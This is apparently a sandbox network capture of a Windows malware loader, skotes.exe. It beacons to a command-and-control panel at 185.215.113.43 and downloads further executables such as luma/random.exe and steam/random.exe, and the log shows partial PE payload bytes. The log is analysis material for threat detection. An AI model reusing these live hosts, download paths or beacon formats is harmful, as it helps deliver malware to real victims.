Nov 11, 2024 01:15:07.972244978 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 42 32 42 37 39 42 39 35 42 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CBB2B79B95B82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Nov 11, 2024 01:15:08.935795069 CET	630	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 11 Nov 2024 00:15:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 62 37 0d 0a 20 3c 63 3e 31 30 30 35 34 31 33 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 38 31 35 34 31 30 65 39 39 38 31 38 32 34 36 39 30 31 36 30 65 66 34 36 62 34 63 63 64 34 62 34 66 66 61 30 66 61 63 65 36 37 39 37 23 31 30 30 35 34 31 34 30 30 31 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 63 30 66 39 63 33 30 62 34 62 61 65 64 37 34 63 36 31 33 39 35 64 37 66 61 63 30 30 62 35 38 39 38 37 65 38 65 37 65 37 62 39 63 61 33 30 38 30 34 30 34 32 62 61 35 63 65 39 30 32 34 31 35 34 35 30 23 31 30 30 35 34 31 35 30 30 31 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 63 30 66 39 63 33 30 62 34 62 61 65 64 37 34 63 36 31 33 39 35 64 37 66 61 63 30 30 62 35 38 39 38 37 65 38 66 38 65 36 62 31 63 61 37 32 64 64 35 33 34 64 62 30 35 37 65 62 34 31 30 61 34 39 34 64 39 64 23 31 30 30 35 34 31 36 30 33 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 64 30 32 34 36 62 35 63 62 34 66 36 35 32 32 34 32 37 66 61 65 31 64 61 61 38 65 39 65 62 34 66 66 66 37 62 35 63 36 33 30 38 30 34 30 34 32 [TRUNCATED] Data Ascii: 1b7 <c>1005413001+++b5937c1a99d5f9815410e9981824690160ef46b4ccd4b4ffa0face6797#1005414001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8e7e7b9ca30804042ba5ce902415450#1005415001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8f8e6b1ca72dd534db057eb410a494d9d#1005416031+++b5937c1a99d5f9dd0246b5cb4f6522427fae1daa8e9eb4fff7b5c630804042ba5ce902415450#1005417001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8e4f4b2846d934f48b15eaa495c49#<d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49846	87.236.16.19	80	7956	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 01:15:09.137866974 CET	47	OUT	GET /test2.exe HTTP/1.1 Host: mncrafter.ru
Nov 11, 2024 01:15:10.060889006 CET	1236	IN	HTTP/1.1 200 OK Server: nginx-reuseport/1.21.1 Date: Mon, 11 Nov 2024 00:15:09 GMT Content-Type: application/octet-stream Content-Length: 2900584 Last-Modified: Mon, 11 Nov 2024 00:05:30 GMT Connection: keep-alive Keep-Alive: timeout=30 ETag: "67314a4a-2c4268" Expires: Wed, 11 Dec 2024 00:15:09 GMT Cache-Control: max-age=2592000 Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 68 72 ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 64 86 08 00 d5 49 31 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 00 00 92 00 00 00 84 2b 00 00 00 00 00 40 11 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 2c 00 00 04 00 00 00 00 00 00 02 00 60 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 68 ca 00 00 3c 00 00 00 00 80 2c 00 78 03 00 00 00 50 2c 00 98 01 00 00 00 1a 2c 00 68 28 00 00 00 90 2c 00 78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 b0 00 00 28 00 00 00 10 b4 [TRUNCATED] Data Ascii: MZx@xhr!L!This program cannot be run in DOS mode.$PEdI1g"+@@,`h<,xP,,h(,x(8X.text `.rdata!"@@.datah+V+@.pdataP,,@@.00cfg`,,@@.tlsp,,@.rsrcx,,@@.relocx,,@B
Nov 11, 2024 01:15:10.060950041 CET	212	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: VH HHHH1
Nov 11, 2024 01:15:10.060960054 CET	1236	IN	Data Raw: 4d 5a 00 00 75 4b 48 63 51 3c 81 3c 11 50 45 00 00 75 3e 48 01 d1 0f b7 51 18 81 fa 0b 02 00 00 74 17 81 fa 0b 01 00 00 75 27 83 79 74 0f 72 21 48 81 c1 e8 00 00 00 eb 10 83 b9 84 00 00 00 0f 72 0f 48 81 c1 f8 00 00 00 31 c0 83 39 00 0f 95 c0 48 Data Ascii: MZuKHcQ<<PEu>HQtu'ytr!HrH19H9)$,xH00H00H,8uH 1H ^H(H#,H#,HoDHD$ H#,H#,L#,
Nov 11, 2024 01:15:10.060976982 CET	1236	IN	Data Raw: 82 fe ff ff c7 05 e4 ca 00 00 50 c7 3d 54 e8 73 fe ff ff c7 05 d5 ca 00 00 fc c1 8e 65 e8 64 fe ff ff c7 05 c6 ca 00 00 93 b2 5e db e8 55 fe ff ff c7 05 b7 ca 00 00 46 d1 36 38 e8 46 fe ff ff c7 05 a8 ca 00 00 aa da ed 50 e8 37 fe ff ff c7 05 99 Data Ascii: P=Tsed^UF68FP7_(Cd{l>]sH7NC?S0!_d-H
Nov 11, 2024 01:15:10.060996056 CET	1236	IN	Data Raw: 3a f0 45 85 c0 74 e7 48 8b 4c 3a f8 48 8b 14 3a 48 83 ec 20 49 89 f1 41 ff d6 48 83 c4 20 48 8b 15 21 1b 2c 00 8b 05 23 1b 2c 00 eb c1 48 8d 65 08 5b 5f 5e 41 5c 41 5d 41 5e 41 5f 5d c3 8b 53 08 83 fa 01 0f 85 5b 01 00 00 48 83 c3 0c 48 3b 1d 79 Data Ascii: :EtHL:H:H IAH H!,#,He[_^A\A]A^A_]S[HH;yaL5L=AHuIffffff.HH9!KAAAAACLN2OcMADMEDMfED
Nov 11, 2024 01:15:10.061007023 CET	1236	IN	Data Raw: 08 00 00 c0 0f 84 a0 00 00 00 eb 61 b9 08 00 00 00 e9 8e 00 00 00 3d 1d 00 00 c0 75 50 b9 04 00 00 00 31 d2 e8 61 81 00 00 48 85 c0 74 3f 48 83 f8 01 75 64 ba 01 00 00 00 b9 04 00 00 00 e8 47 81 00 00 eb 65 b9 0b 00 00 00 31 d2 e8 39 81 00 00 48 Data Ascii: a=uP1aHt?HudGe19HtHuC=H,HtH@,HH [_^H1@,H [_^fffff.HH,DH,
Nov 11, 2024 01:15:10.061017990 CET	848	IN	Data Raw: 89 f2 e8 0f 7d 00 00 85 c0 74 0a 48 83 c7 28 ff cb 75 e3 31 ff 48 89 f8 48 83 c4 20 5b 5f 5e c3 66 0f 1f 44 00 00 48 8b 05 51 8c 00 00 0f b7 10 81 fa 4d 5a 00 00 75 5a 48 63 50 3c 81 3c 10 50 45 00 00 75 4d 48 01 d0 0f b7 50 18 81 fa 0b 02 00 00 Data Ascii: }tH(u1HH [_^fDHQMZuZHcP<<PEuMHPu>Pt6H+D@LHDH(tD@L9rD@L9s1H1MZu!HcQ<<PEuDDAuDf.HMZuVHcP<<PE
Nov 11, 2024 01:15:10.061028004 CET	1236	IN	Data Raw: 48 c7 84 24 98 00 00 00 00 00 00 00 4c 8d 8c 24 98 00 00 00 b9 05 00 00 00 31 d2 45 31 c0 e8 60 ee ff ff 85 c0 0f 88 ef 00 00 00 48 8b 3c 25 40 00 00 00 80 3d 9a 0e 2c 00 00 0f 84 0d 06 00 00 48 8d b4 24 38 01 00 00 80 3d c1 0f 2c 00 00 74 5a 66 Data Ascii: H$L$1E1`H<%@=,H$8=,tZfo,f%f-f,~,f%f-fu,w,-fj,e,HD,AHFx$00fFFH%PH$H$
Nov 11, 2024 01:15:10.061038971 CET	1236	IN	Data Raw: 8d 9c 24 88 00 00 00 48 8d b4 24 c8 00 00 00 48 c7 c1 ff ff ff ff 48 89 da 45 31 c0 49 89 f1 e8 d7 e8 ff ff 48 8b 84 24 88 00 00 00 48 c7 00 68 00 00 00 48 c7 40 08 05 00 02 00 4c 89 78 10 48 89 78 18 48 c7 40 28 00 00 06 00 48 c7 40 30 08 00 00 Data Ascii: $H$HHE1IH$HhH@LxHxH@(H@0HL$XHH8H@HH@PHL$hHHXH$1HAHQHD$PH$HD$HLd$@$D$8t$ D$0AAzHHT$`L$A.HH
Nov 11, 2024 01:15:10.061052084 CET	1236	IN	Data Raw: 31 c0 83 f8 2b 45 0f 44 c1 eb 26 0f 1f 00 83 c0 bf eb 1b 66 66 2e 0f 1f 84 00 00 00 00 00 83 c0 b9 eb 0b 83 c0 04 0f 1f 84 00 00 00 00 00 41 89 c0 46 0f b6 54 33 02 41 8d 42 a5 3c e6 73 2f 41 8d 42 85 3c e6 73 37 41 8d 42 c6 3c f6 73 35 b8 3f 00 Data Ascii: 1+ED&ff.AFT3AB<s/AB<s7AB<s5?A/t1A+AD+Af.AAfDDFT3EZAs-EZAs3EZAs/A?A/tE1A+ED#Af.AAfDE
Nov 11, 2024 01:15:10.065891981 CET	1236	IN	Data Raw: f1 e8 c6 de ff ff 85 c0 78 0a 48 8b 4c 24 78 e8 f4 de ff ff 42 0f b7 44 3b 02 66 85 c0 0f 85 9d fe ff ff eb 46 c6 05 40 01 2c 00 01 48 b8 49 00 2c 00 2c 00 49 00 48 89 05 25 01 2c 00 66 c7 05 24 01 2c 00 ed 00 48 8d 0d 5d 02 00 00 e8 c8 dd ff ff Data Ascii: xHL$xBD;fF@,HI,,IH%,f$,H]+=,H$AH1j=+=,t<~+fff++f++H+HiHHkiH$

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49870	185.215.113.43	80	7956	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 01:15:13.563170910 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 35 34 31 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1005413001&unit=246122658369
Nov 11, 2024 01:15:14.469197989 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 11 Nov 2024 00:15:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49876	185.215.113.16	80	7956	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 01:15:14.479444027 CET	55	OUT	GET /luma/random.exe HTTP/1.1 Host: 185.215.113.16
Nov 11, 2024 01:15:15.385550976 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 11 Nov 2024 00:15:15 GMT Content-Type: application/octet-stream Content-Length: 3199488 Last-Modified: Sun, 10 Nov 2024 23:53:41 GMT Connection: keep-alive ETag: "67314785-30d200" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 53 d3 15 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 4a 04 00 00 d6 00 00 00 00 00 00 00 e0 30 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 31 00 00 04 00 00 a1 28 31 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 a0 05 00 68 00 00 00 00 90 05 00 40 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 a1 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PELSgJ0@1(1@Th@ @.rsrc@@.idata @gjurczzz ++@jwharnkx00@.taggant00"0@
Nov 11, 2024 01:15:15.385569096 CET	112	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 11, 2024 01:15:15.385579109 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 11, 2024 01:15:15.385590076 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 11, 2024 01:15:15.385600090 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 11, 2024 01:15:15.385611057 CET	1236	IN	Data Raw: aa 7e a2 4c c3 8a d5 9c 48 c7 43 d7 ce 31 e2 0e 80 3a a3 83 f7 8a a6 46 c6 7b 1f 8a e4 00 4c f2 03 7b 15 d0 e3 83 3f 9a 44 d9 22 8b bf 06 64 af e3 06 28 0e 80 7f a8 cf e3 9f e6 cf e3 8b 1f 8b bf 7b 9f 85 35 8a a3 76 cc 7b 1f 10 89 06 54 af ce 04 Data Ascii: ~LHC1:F{L{?D"d({5v{T{eICJC@E{w{4"93{$IcJC{{!l{Cg<7h/o+'[#O6{K4{'QKC+M
Nov 11, 2024 01:15:15.385622978 CET	448	IN	Data Raw: e0 ef 23 14 b3 ac 15 15 99 84 10 01 f3 34 21 8b bf 7b a2 c7 e3 7d 9c b3 4c ff 43 e6 c1 7b 1f 14 04 9f 37 16 04 9f 2b 4c a0 8f 44 8b bf 7b 2e 8c 87 04 64 af cb 04 6c af df ac 15 75 9b 85 1f 8b 4c 07 44 e6 c1 7b 1f 14 0c 9f 37 18 44 9f 7b 8d bf 7b Data Ascii: #4!{}LC{7+LD{.dluLD{7D{{}PP\|qdJC\|LPd</C \|dd6zl^_KCnl(4#Gu8/kH\uIC?@\|f.PPPzdL/)zMD
Nov 11, 2024 01:15:15.385632992 CET	1236	IN	Data Raw: 4a bf 43 8f 42 3b 1d 15 96 71 e2 8e ce ff fd 9a bf 7b a4 4b cf ff 57 9b bf 7b 9f c9 bf 8a a3 f4 de 7b 1f 18 01 7f aa ff e3 7f a2 51 bc 23 23 9a 43 3c 2f 8b bf 00 16 9b 43 8c 2f 8b bf 64 26 9b bf 7b a7 1f e4 d6 21 8b bf 42 64 af df 7c 1f 8b bf 41 Data Ascii: JCB;q{KW{{Q##C</C/d&{!Bd\|Ad{RS{R+{Dz{{PD{{Cu\|Ll}C{CAd{{{!d{B;(C'{D'd{
Nov 11, 2024 01:15:15.385643005 CET	1236	IN	Data Raw: 91 06 7c af d7 06 94 af c3 0b b0 1b 50 0b b0 1b 50 0b b0 1b 50 8a d5 cf d2 7c a7 8f d5 8a d5 cf d2 7d a7 cf d5 7c 2e 41 04 8e 22 13 04 91 21 9a 75 bf 32 8f 47 bf 35 8e ce 31 64 9e c4 03 64 a1 c3 8a d5 cf d2 81 a7 cf d5 80 2e 41 04 8e 26 13 04 91 Data Ascii: \|PPP\|}\|.A"!u2G51dd.A&%u2G5B=(\|JCKMDPPP$\|4#.ATIC=hQMHCC3!{HSIC{zXG<
Nov 11, 2024 01:15:15.385656118 CET	1236	IN	Data Raw: 5e 54 ea 02 f3 57 1a 17 04 9f 27 18 48 7b 1f 8b c2 b8 1e 8b bf 7b 96 ab 9c 5d ff 6b 5e 8a a5 55 d5 7b 1f 64 8a 58 01 69 99 5a 00 2a 99 69 f9 54 99 45 2f 11 75 90 1f 8b 9c 53 fd 63 49 c7 43 93 7d 81 1f 8b bf 06 24 af 42 73 1f 00 c2 04 e6 0e ac 97 Data Ascii: ^TW'H{{]k^U{dXiZ*iTE/uScIC}$Bsc{OkAd{;{o#+K'3 X4S{4R+{37tDq/N{D_4x
Nov 11, 2024 01:15:15.390454054 CET	1236	IN	Data Raw: 86 bb 23 bb ef ab 4f 52 00 83 4f bb ef ab e6 cb cb ab 4f bb ef 42 60 9b ef ab 4f bb 86 bb 33 bb ef ab 4f 52 00 93 4f bb ef ab e6 cb db ab 4f bb ef fe df ab 4c c6 ff 0e 83 57 a3 86 b8 04 eb fd 78 00 e9 ff 04 04 ea 0e a2 82 93 ad f0 56 b0 1b 50 0b Data Ascii: #OROOB`O3OROOLWxVPPPPA$Xe5r!cIEIe}UCt(B OROK5fLKCLR/'?T3QKHQeC]#\|PPdhHC1 b#

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	50015	185.215.113.43	80	7956	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 01:15:40.042313099 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 35 34 31 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1005414001&unit=246122658369
Nov 11, 2024 01:15:40.942573071 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 11 Nov 2024 00:15:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	50022	185.215.113.16	80	7956	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 01:15:40.952178955 CET	56	OUT	GET /steam/random.exe HTTP/1.1 Host: 185.215.113.16
Nov 11, 2024 01:15:41.863501072 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 11 Nov 2024 00:15:41 GMT Content-Type: application/octet-stream Content-Length: 1847808 Last-Modified: Sun, 10 Nov 2024 23:53:54 GMT Connection: keep-alive ETag: "67314792-1c3200" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ce ac e2 38 8a cd 8c 6b 8a cd 8c 6b 8a cd 8c 6b e5 bb 27 6b 92 cd 8c 6b e5 bb 12 6b 87 cd 8c 6b e5 bb 26 6b b0 cd 8c 6b 83 b5 0f 6b 89 cd 8c 6b 83 b5 1f 6b 88 cd 8c 6b 0a b4 8d 6a 89 cd 8c 6b 8a cd 8d 6b d1 cd 8c 6b e5 bb 23 6b 98 cd 8c 6b e5 bb 11 6b 8b cd 8c 6b 52 69 63 68 8a cd 8c 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 4f c3 2f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 40 22 00 00 00 00 00 00 a0 6a 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 d0 6a 00 00 04 00 00 7e cb [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$8kkk'kkkk&kkkkkkjkkk#kkkkRichkPELO/g@"j@j~@M$a$ $b@.rsrc $r@.idata $r@ 0+$t@oovdzvsfOv@lmbmcfafj@.taggant0j"@
Nov 11, 2024 01:15:41.863512993 CET	112	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 11, 2024 01:15:41.863531113 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 11, 2024 01:15:41.863542080 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 11, 2024 01:15:41.863550901 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 11, 2024 01:15:41.863562107 CET	1236	IN	Data Raw: c1 1b a3 40 e3 19 f4 c7 b6 6a 7c df 39 d2 c9 ee f3 8a 73 bf 84 fa fd 4a fc 46 13 96 3f ef 76 fa a8 45 9a f5 8a 7b 42 42 74 bf 3b f0 2e 6e a5 27 96 8d a4 6f 82 66 63 c4 b7 3f 59 a1 82 89 4a 46 0d eb 99 2a 04 d8 2e ea 0e 0a 35 6b 97 7c ea 43 ac 82 Data Ascii: @j\|9sJF?vE{BBt;.n'ofc?YJF*.5k\|Cp~&sJkj{&w+`;k~bTMS6R33{ZG=RRrxF>:m/j9IY070xyu8I(vOj^Z8V
Nov 11, 2024 01:15:41.863570929 CET	448	IN	Data Raw: 23 9d 6d 54 b5 46 bb 49 29 03 e1 74 36 27 69 44 77 80 a6 7a 63 fc ef aa 83 cf fb b7 bc 88 7b 68 75 0d b2 97 4d 0e 67 f6 83 8a f2 c7 34 aa 47 d7 33 af fe 6a 09 03 52 c3 ea af fd e6 b5 cb c1 49 58 85 e3 4c 13 c0 46 22 2b d6 d9 31 7a 85 ae a6 66 37 Data Ascii: #mTFI)t6'iDwzc{huMg4G3jRIXLF"+1zf7rR>J&w9]F<KatG{iNqHcHzwS7%AN(<,/'^$&*+gIAFcUP)Wpm\n;@
Nov 11, 2024 01:15:41.863580942 CET	1236	IN	Data Raw: 38 6b 0f 18 22 88 91 34 4c f9 37 89 e6 02 82 02 2c 43 fa 40 ee 83 f0 17 fa ef d0 a8 bd 45 7d 34 87 c0 e9 4e 82 87 ce 99 fa 49 c3 ee b2 f4 61 3f c4 d0 7d ad 7b 7a ca 3d 7c 37 2f 95 c2 00 69 df 1c a0 f1 aa b9 c6 62 1a 57 96 e9 5e 37 66 10 c5 78 e0 Data Ascii: 8k"4L7,C@E}4NIa?}{z=\|7/ibW^7fxlSB0%YUQp{r~r'\{~d83IzwvrObogG#[*@yuNe=E#sRQ}='l^
Nov 11, 2024 01:15:41.863590956 CET	1236	IN	Data Raw: 81 3e 7f 21 27 83 b9 5d 51 fe 9c 22 81 bc 1a 52 57 85 d9 83 cf b2 c6 4b 0c bb 01 82 86 eb ea c8 85 90 8b fe 8a f7 71 27 b5 f0 76 bf cc 9a d8 48 14 3e b3 9f be 1b 06 2f 7c 3c 5f 59 31 b8 ca 1a 82 de 72 a0 ab 9b aa ee 79 bc 6a f3 ee f0 a6 20 d7 eb Data Ascii: >!']Q"RWKq'vH>/\|<_Y1ryj >Jn.}~1{fJ#~!Y;zT?j B{kzp@lZ[2u2Rsb{RUTPkEN"\\|+v
Nov 11, 2024 01:15:41.863600969 CET	1236	IN	Data Raw: 5c c8 f6 b1 52 b6 09 aa b6 b0 d2 5a 81 bc d2 51 b3 84 da cf 5b e3 ca 3a 81 aa 7e 13 af bc a5 9e 57 5d f3 fa ee 1c c3 c7 b5 e1 ca 44 fb 9b 0d d7 7b a6 5a 1b c2 b7 7b 23 5e 8a 5a 5a e7 03 25 52 6b ee 48 b2 3b 7e 0d 9b 50 04 c0 4e 55 f0 84 22 83 52 Data Ascii: \RZQ[:~W]D{Z{#^ZZ%RkH;~PNU"R*@&r3-SAq2rk[kGD+YZW{."BKurQ&"+&O"Qv"L~@FjM!_X&.
Nov 11, 2024 01:15:41.868463993 CET	1236	IN	Data Raw: f1 bc 67 22 6d 1a 0d 21 cf 83 b9 f2 8e 36 5b 21 d7 ed 4d 49 cb b4 7b 6a cf b3 e0 1e 7d f3 aa 23 83 bb 88 a3 0b 14 7f c9 58 ff bf 27 55 bf 2a 52 27 02 9b be ae ef ed 7b 4a 15 08 23 d7 c4 fe 4c 7a 59 fc fc df bc df 02 81 ae 5a 1b 1a 01 6a 03 ff c2 Data Ascii: g"m!6[!MI{j}#X'UR'{J#LzYZj"'-+S~\@kO&:"CNU2!~MQg~pX~e/jQ!7#&k<~K"wg~{MrzbKS}qv^3r*C

Session ID	Source IP	Source Port	Destination IP	Destination Port
10	192.168.2.4	50042	185.215.113.206	80

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 01:15:48.571645975 CET	90	OUT	GET / HTTP/1.1 Host: 185.215.113.206 Connection: Keep-Alive Cache-Control: no-cache
